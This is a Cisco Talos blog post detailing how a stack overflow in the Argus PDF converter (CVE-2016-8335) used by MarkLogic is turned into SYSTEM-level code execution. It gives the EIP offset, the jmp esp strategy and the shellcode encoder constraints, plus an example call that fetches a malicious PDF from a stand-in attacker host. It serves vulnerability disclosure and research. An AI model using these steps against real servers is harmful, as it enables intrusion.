Deep Dive in MarkLogic Exploitation Process via Argus PDF Converter

This post authored by Marcin Noga with contributions from William Largent
Talos discovers and responsibly discloses software vulnerabilities on a regular basis. Occasionally we publish a deep technical analysis of how the vulnerability was discovered or its potential impact. In a previous post Talos took a deep dive into Lexmark Perceptive Document Filters, in this post we are going to focus on another converter used by MarkLogic located in `Converters/cvtpdf` folder, which is responsible for converting pdf to XML-based formats - Argus PDF. This blog will cover the technical aspects including discovery and exploitation process via the Argus PDF converter.

How exactly does it affect MarkLogic?

Before getting into the details watch this video which shows remote code execution tested on Marklogic 8.0-5.5 on Windows,, obtaining SYSTEM level privileges!

By using the dll in Argus PDF and the converter binary we can find the converter in the Marklogic directory at the following location:

How exactly can we force MarkLogic to use this converter? Marklogic uses this converter each time XDMP API "pdf-convert" is used.

From the documentation’s description of this API:

Converts a PDF file to XHTML. Returns several nodes, including a parts node, the converted document xml node, and any other document parts (for example, css files and images). The first node is the parts node, which contains a manifest of all of the parts generated as result of the conversion.
Example of usage -- where the pdf we want to convert is read from an untrusted source::

xdmp:pdf-convert( xdmp:document-get("http://evildomain.localhost.com/malicious.pdf"), "malicious.pdf" )
When the above "pdf-convert" API is called, the MarkLogic daemon spawns the "convert" binary, along with the use of the Argus.dll, which is responsible for converting the pdf into (x)html form.

Increased damage

As in our previous exploitation example, in the newer version of MarkLogic on Windows the "convert" component is spawned by MarkLogic without dropping privileges so "convert" performs its tasks with SYSTEM privileges! That dramatically increases the impact of successful exploitation because we gain the highest privileges on the system automatically.

Recon

During the research related to this product Talos found multiple vulnerabilities in Iceni Argus PDF lib. To demonstrate the exploitation process we will use CVE-2016-8335 (TALOS-2016-0202) Iceni Argus ipNameAdd Code Execution, which is a classic stack based buffer overflow.

Linux version
First let’s examine how the linux version of this converter will act when we attempt to convert our malformed pdf file:

In this case the `convert` library has been compiled with security cookies which would make exploitation more difficult, though it is worth mentioning that this mechanism can be bypassed in certain conditions. You can read a great example of this in Bypassing MiniUPnP Stack Smashing Protection by Talos’ Aleksander Nikolic.

Existence of security cookies and a confirm checksec:

Again we see that the `convert` executable does not support ASLR.

NOTICE : In the linux version the Argus library has been statically compiled with `convert` application.

Windows
Ok, let’s check it on Windows:

Perfect, no stack cookies so exploitation should be straightforward. For further information on the triaging process see the details in the advisory available here. The following is a summary version where we will give general details about what went wrong and how to trigger this vulnerability.

Steps to Rule Them All

1. Vulnerability exists in function `ipNameAdd`.
2. Vulnerable code.

Line 12 contains buggy strcpy call

3. Attacker creating `token` not being "regular" `Name object`, Integer, Float, or HexString will cause a stack based buffer overflow leading to arbitrary code execution.
4. pdf example triggering this vulnerability.

5. The overflowing "string"/chain of bytes can contain characters in the range [0x21-0xff] without 0x80.

Now we have all the necessary information and can start moving into the exploitation process.

Exploitation

Cyclic Pattern
How many bytes are needed to overwrite the RET address?

We will use Immunity Debugger with mona.py to obtain that info, generate a cyclic pattern, and replace the overflowing "AAAA..." string in our pdf.

Re-Run our app :

Bingo! EIP has been overwritten with our cyclic buffer using `!mona pattern_offset (po) eip` command. We get the info for our EIP value at offset 260.

We can make our proof of concept exploit by overwriting EIP with our controlled value:

Building the Exploitation Strategy

We have the exploit skeleton and can control EIP, now let’s check the loaded module and the mitigations implemented to have a clear picture of what path we should take to successfully exploit this case.

Lack of mitigations?! NO DEP !!!

Do our eyes deceive us? The executable file does not support DEP/ASLR and none of it is used by the modules. That means that you can turn on your favorite song from 90’s sit back and feel once again the charm of direct-ret jmp esp exploits, now in 2017!

Direct-RET

Generally we just need to find the "jmp esp" instruction and remember about constraints:

"-x *" because we don't care about whether page has "X (executable)" permission set, our pointer also has some limitation but to simplify it we will restrict it to "-cp alphanum" and throw out "-cpb \x20".

Shellcode
The same constraints used during shellcode generation :

Worth noting here is that we need to tell the encoder where the start address of our shellcode is located. In our case this address is in the ESP register and we pass that info to the encoder via "BufferRegister=ESP"

PoC

Now we can test our exploit:

Summary

This deep dive provides a clear view into the process of taking a vulnerability and weaponizing it into a useable exploit. Just because a vulnerability exists does not mean that it is easily weaponized, in most circumstances the path to weaponization is arduous. However, this also significantly increases the value of the vulnerability, depending on the methodology required to actually exploit it. Cisco Talos will continue to discover and responsibly disclose vulnerabilities on a regular basis including further deep dive analysis.

Cisco Talos Blog

Intelligence Center

Vulnerability Information

Security Resources

Media

Company

Deep Dive in MarkLogic Exploitation Process via Argus PDF Converter

How exactly does it affect MarkLogic?

Increased damage

Recon

Linux version
First let’s examine how the linux version of this converter will act when we attempt to convert our malformed pdf file:

Windows
Ok, let’s check it on Windows:

Steps to Rule Them All

Exploitation

Cyclic Pattern
How many bytes are needed to overwrite the RET address?

Building the Exploitation Strategy

Lack of mitigations?! NO DEP !!!

Direct-RET

Shellcode
The same constraints used during shellcode generation :

PoC

Summary

Intelligence Center

Vulnerability Research

Incident Response

Security Resources

Media

Support

Company

Cisco Talos Blog

Deep Dive in MarkLogic Exploitation Process via Argus PDF Converter

How exactly does it affect MarkLogic?

Increased damage

Recon

Linux version First let’s examine how the linux version of this converter will act when we attempt to convert our malformed pdf file:

Windows Ok, let’s check it on Windows:

Steps to Rule Them All

Exploitation

Cyclic Pattern How many bytes are needed to overwrite the RET address?

Building the Exploitation Strategy

Lack of mitigations?! NO DEP !!!

Direct-RET

Shellcode The same constraints used during shellcode generation :

PoC

Summary

Share this post

Linux version
First let’s examine how the linux version of this converter will act when we attempt to convert our malformed pdf file:

Windows
Ok, let’s check it on Windows:

Cyclic Pattern
How many bytes are needed to overwrite the RET address?

Shellcode
The same constraints used during shellcode generation :